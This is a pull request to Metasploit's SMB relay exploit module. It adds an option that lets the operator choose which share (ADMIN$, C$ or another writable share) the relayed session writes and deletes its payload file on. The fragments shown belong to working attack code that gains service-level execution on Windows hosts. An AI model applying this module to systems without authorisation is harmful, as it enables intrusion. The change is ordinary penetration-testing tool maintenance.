### PR TITLE
Patch for smb_relay.rb to allow the share written to, to be defined in an option

### DIFF
--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -94,7 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		register_options(
 			[
-				OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"])
+				OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]),
+				OptString.new('SHARE',     [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])
 			], self.class )
 	end
 
@@ -124,8 +125,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-		print_status("Connecting to the ADMIN$ share...")
-		rclient.connect("ADMIN$")
+		print_status("Connecting to the defined share...")
+		rclient.connect(datastore['SHARE'])
 
 		@pwned[smb[:rhost]] = true
 
@@ -155,8 +156,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Created \\#{filename}...")
 
-		# Disconnect from the ADMIN$
-		rclient.disconnect("ADMIN$")
+		# Disconnect from the SHARE
+		rclient.disconnect(datastore['SHARE'])
 
 		print_status("Connecting to the Service Control Manager...")
 		rclient.connect("IPC$")
@@ -295,7 +296,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		rclient.disconnect("IPC$")
 
 		print_status("Deleting \\#{filename}...")
-		rclient.connect("ADMIN$")
+		rclient.connect(datastore['SHARE'])
 		rclient.delete("\\#{filename}")
 	end
 


### PR DESCRIPTION
As described in Redmine Feature #5455
https://dev.metasploit.com/redmine/issues/5455
